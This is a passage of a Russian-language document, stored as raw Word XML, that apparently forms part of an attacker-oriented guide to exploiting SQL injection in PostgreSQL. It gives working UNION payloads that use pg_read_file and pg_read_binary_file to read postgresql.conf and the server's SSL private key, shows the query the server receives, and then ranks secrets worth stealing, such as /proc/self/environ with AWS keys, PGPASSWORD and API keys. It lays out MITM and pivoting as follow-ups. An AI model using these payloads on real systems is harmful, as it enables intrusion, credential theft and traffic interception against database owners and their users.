    <w:p w14:paraId="764C5E15" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SELECT id, name, price FROM products WHERE category = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC25352" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 0, pg_read_file(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C036F32" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    '/etc/postgresql/16/main/postgresql.conf', 0, 50000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACD950C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>), 0 --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDBDCED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — содержимое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgresql.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (до 50 KB). Что это даёт атакующему:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB75BC4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>listen_addresses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — карта сетевых интерфейсов кластера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51486F27" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ssl_cert_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ssl_key_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — точные пути к SSL-сертификатам и приватному ключу (→ цель для Payload C).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DD1C3C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hba_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ident_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — пути к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_ident.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (следующий пивот: чтение auth-конфигурации).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5791074E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_filename</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — расположение логов (потенциальный источник запросов других пользователей, паролей в plaintext если включён </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_min_messages=DEBUG</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D22F8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data_directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (если переопределён) — точная локация для следующих относительных-путь payload-ов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27770380" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для файлов &gt;50 KB — повторять с увеличивающимся offset: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file('...', 50000, 50000)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file('...', 100000, 50000)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и т.д. Путь приведён для Debian/Ubuntu-style инсталляций; для RHEL/CentOS — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/var/lib/pgsql/16/data/postgresql.conf</w:t>
      </w:r>
      <w:r>
        <w:t>, адаптировать по дистрибуции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCDFFDF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — pg_read_binary_file для SSL-ключа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DDD498" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для не-текстовых файлов (бинарные, файлы с NUL-байтами, файлы в произвольной кодировке) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ломается на первом NUL — возвращает только префикс до первого </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\x00</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_binary_file()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bytea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, что обрабатывает любые байты. Для транспорта в HTTP-response — обернуть в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>encode(..., 'base64')</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0131A91C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `category`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69313B23" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, encode(pg_read_binary_file('/etc/ssl/private/server.key'), 'base64'), 0 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B68EC0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168F234F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, name, price FROM products WHERE category = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4A5316" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 0, encode(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A622E1D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    pg_read_binary_file('/etc/ssl/private/server.key'), 'base64'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438FCE13" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>), 0 --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE189F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — base64-encoded приватный ключ SSL-сертификата кластера. Эффект — компрометация ключа целиком: атакующий может (а) расшифровать ранее перехваченные TLS-дампы трафика клиент↔PG (если cipher не PFS); (б) поднять MITM-сервер с этим сертификатом — клиенты подключатся не заметив подмены; (в) если ключ переиспользован для других сервисов (типично в legacy-инфре) — pivot за пределы PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D75B0A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Четыре под-цели file-read, у каждой своя применимость:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1705CE75" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Direct file-read</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — содержимое произвольных файлов с правами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Linux: обычно uid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgres:postgres</w:t>
      </w:r>
      <w:r>
        <w:t>, доступ к собственным файлам (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0640</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0600</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>data_directory</w:t>
      </w:r>
      <w:r>
        <w:t>) + к любым world-readable (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0644</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) на ФС. Windows: эквивалент — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NT AUTHORITY\NetworkService</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или специальный postgres-аккаунт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CE1A4C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuration disclosure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>postgresql.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_hba.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_ident.conf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → понимание auth-модели (где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>trust</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>md5</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>scram-sha-256</w:t>
      </w:r>
      <w:r>
        <w:t>, какие сети whitelisted), расположение секретов, GUC-параметры безопасности (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>row_security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log_statement</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D3AD81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Secret compromise</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — приоритеты целей:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B3E3D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`/proc/self/environ`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Linux) — env-vars backend-процесса; реально приходят сюда: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PGPASSWORD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DATABASE_URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AWS_SECRET_ACCESS_KEY</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AWS_SESSION_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GOOGLE_APPLICATION_CREDENTIALS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-путь, любые </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*_API_KEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> экспортированные в окружение postmaster. Реалистичнее чем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>~/.aws/credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, потому что в managed/docker-средах файлов с креденшалами часто нет — всё в env. Файл NUL-separated, читать обязательно через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_binary_file('/proc/self/environ')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>encode(..., 'escape')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, иначе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read_file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> оборвётся на первом байте.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00377404" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
